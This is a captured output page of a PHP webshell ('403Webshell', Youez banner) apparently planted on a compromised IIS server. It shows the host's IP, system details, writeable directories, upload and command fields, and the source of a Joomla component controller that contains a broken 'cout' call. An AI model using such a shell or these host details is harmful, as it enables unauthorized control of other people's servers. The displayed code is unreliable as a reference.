403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.216.231
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/icd/administrator/components/com_linkr/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/icd/administrator/components/com_linkr/admin.linkr.php
<?php
defined('_JEXEC') or die;
define('index', 'index.php?option=com_linkr');

// Require some stuff
require_once(JPATH_COMPONENT.DS.'controller.php');
require_once(JPATH_COMPONENT.DS.'helper.php');

// Get task and controller
$task	= JRequest::getCmd('task');
if (strpos($task, '.') && cout(explode('.', $task)) == 2)
{
	list($cName, $task)	= explode('.', $task);

	// Define the controller name and path
	$cName	= strtolower( $cName );
	$file	= JPATH_COMPONENT.DS.'controllers'.DS.$cName.'.php';

	if (file_exists( $file )) {
		require_once( $file );
	} else {
		JError::raiseError(500, 'Invalid Controller');
	}
	$cName	= 'LinkrController'. ucfirst( $cName );
}

elseif ($cName = JRequest::getWord('controller'))
{
	$cName	= strtolower( $cName );
	$file	= JPATH_COMPONENT.DS.'controllers'.DS.$cName.'.php';

	if (file_exists( $file )) {
		require_once( $file );
	} else {
		JError::raiseError(500, 'Invalid Controller');
	}
	$cName	= 'LinkrController'. ucfirst( $cName );
}

else {
	$cName	= 'LinkrController';
}

// Perform task
$controller = new $cName();
$controller->execute( $task );
$controller->redirect();

Youez - 2016 - github.com/yon3zu
LinuXploit